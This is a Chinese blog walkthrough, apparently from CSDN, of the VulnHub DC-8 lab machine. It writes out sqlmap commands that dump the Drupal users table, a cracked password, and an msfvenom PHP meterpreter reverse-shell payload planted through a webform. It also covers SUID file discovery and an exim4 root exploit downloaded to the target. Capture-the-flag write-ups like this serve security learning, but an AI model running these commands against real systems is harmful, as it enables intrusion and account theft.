vulnhub之dc8

各位小伙伴,可直接看这位师傅

https://blog.csdn.net/weixin_44288604/article/details/122944302

个人写的很粗糙
DC8本身的难度较低,可以较为轻松地获取到目标权限,总体思路

主机发现,端口扫描——挖掘服务漏洞——获取后台权限——上传shell——提权

主机发现,端口扫描,服务探测
在这里插入图片描述在这里插入图片描述

在这里插入图片描述一共开启2个端口,80和22端口,80端口开放的服务为drupal 7,打开界面进行检测,这里利用burpsuit联合xray进行检测
burpsuit的user option操作栏中设置自己闲置代理,运行xray即可,如下图所示,这里使用bp自带的浏览器进行测试,然后在界面进行点击,每一个功能点都要点击下
在这里插入图片描述点击到 http://192.168.43.142/?nid=3该界面时候,xray检测到存在sql注入,直接上sqlmap
在这里插入图片描述发现存在两个数据库,d7db,information_schema,这里选择第一个d7db,查看表名

sqlmap -u http://192.168.43.142/?nid=3 --batch  -level 4 -D d7db --tables

在这里插入图片描述在众多的表里面选择users表,直接下载

sqlmap -u http://192.168.43.142/?nid=3 --batch  -level 4 -D d7db -T users --dump

发现存在两个用户,admin和john,但密码为加密之后的数据,尝试进行暴力破解,将这两个密文做成字典,使用john进行暴力破解,爆破出来其中john的密码为turtle,登录后台,查看能够上传shell的位置,这里建议使用谷歌浏览器,别问,问就是能够右键翻译
在这里插入图片描述
在这里插入图片描述在这个界面中,可以定义输入表单之后的界面,这里采用msf生成php木马反弹,已经生成过了,不进行展示

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128  LPORT=8888 -f raw > shell.php

在这里插入图片描述打开该文件,将文件复制到上图位置,选择PHP code,并保存,然后在对应的表单提交复核格式的数据,即可接受到会话

在这里插入图片描述python交互式shell,查找有sudo权限执行的文件

find / -perm -u=s -type f 2>/dev/null

发现存在exim4为sudo权限,查看版本,查找对应exp
在这里插入图片描述在这里插入图片描述exp大法,这里下载第二个,然后复制到攻击机上面,使用python开启http服务,目标机下载运行

在这里插入图片描述在这里插入图片描述获得root权限

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值